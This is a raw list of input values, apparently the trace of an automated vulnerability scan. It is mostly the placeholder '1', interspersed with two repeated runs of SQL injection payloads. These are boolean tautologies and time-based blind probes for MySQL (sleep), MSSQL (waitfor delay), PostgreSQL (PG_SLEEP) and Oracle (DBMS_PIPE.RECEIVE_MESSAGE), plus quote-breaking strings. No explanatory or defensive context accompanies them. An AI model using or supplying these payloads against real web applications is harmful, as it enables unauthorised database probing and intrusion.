-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1NGdxZz0L
-
1
-
1
-
-1 OR 2+610-610-1=0+0+0+1 --
-
-1 OR 2+231-231-1=0+0+0+1
-
-1' OR 2+910-910-1=0+0+0+1 --
-
-1' OR 2+23-23-1=0+0+0+1 or 'X0uag4oB'='
-
-1" OR 2+473-473-1=0+0+0+1 --
-
1
-
1*if(now()=sysdate(),sleep(15),0)
-
1
-
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1-1; waitfor delay '0:0:15' --
-
1
-
1-1); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1-1)); waitfor delay '0:0:15' --
-
1
-
1-1 waitfor delay '0:0:15' --
-
1
-
1lv0K6xGn'; waitfor delay '0:0:15' --
-
1
-
15tXzmF29'); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1loOEf6Dk')); waitfor delay '0:0:15' --
-
1
-
1-1 OR 630=(SELECT 630 FROM PG_SLEEP(15))--
-
1
-
1-1) OR 590=(SELECT 590 FROM PG_SLEEP(15))--
-
1
-
1-1)) OR 597=(SELECT 597 FROM PG_SLEEP(15))--
-
1
-
1VoopuhuN' OR 80=(SELECT 80 FROM PG_SLEEP(15))--
-
1
-
10xhrcKzq') OR 780=(SELECT 780 FROM PG_SLEEP(15))--
-
1
-
1CoOke4D3')) OR 176=(SELECT 176 FROM PG_SLEEP(15))--
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1
-
1'"
-
1????%2527%2522'"
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1DtbkTIFZ
-
1
-
1
-
-1 OR 2+789-789-1=0+0+0+1 --
-
1
-
-1 OR 2+432-432-1=0+0+0+1
-
-1' OR 2+667-667-1=0+0+0+1 --
-
-1' OR 2+74-74-1=0+0+0+1 or 'Qtt0JtBl'='
-
-1" OR 2+880-880-1=0+0+0+1 --
-
1
-
1*if(now()=sysdate(),sleep(15),0)
-
1
-
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1-1; waitfor delay '0:0:15' --
-
1
-
1-1); waitfor delay '0:0:15' --
-
1
-
1-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1-1 waitfor delay '0:0:15' --
-
1
-
1u7MQjXbu'; waitfor delay '0:0:15' --
-
1
-
1iu93iK3Q'); waitfor delay '0:0:15' --
-
1
-
1u113QZAX')); waitfor delay '0:0:15' --
-
1
-
1-1 OR 920=(SELECT 920 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1-1) OR 234=(SELECT 234 FROM PG_SLEEP(15))--
-
1
-
1-1)) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
-
1
-
1y6ECq9n7' OR 242=(SELECT 242 FROM PG_SLEEP(15))--
-
1
-
10KdHWGQF') OR 523=(SELECT 523 FROM PG_SLEEP(15))--
-
1
-
1KFgVgmXf')) OR 632=(SELECT 632 FROM PG_SLEEP(15))--
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1
-
1'"
-
1????%2527%2522'"
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1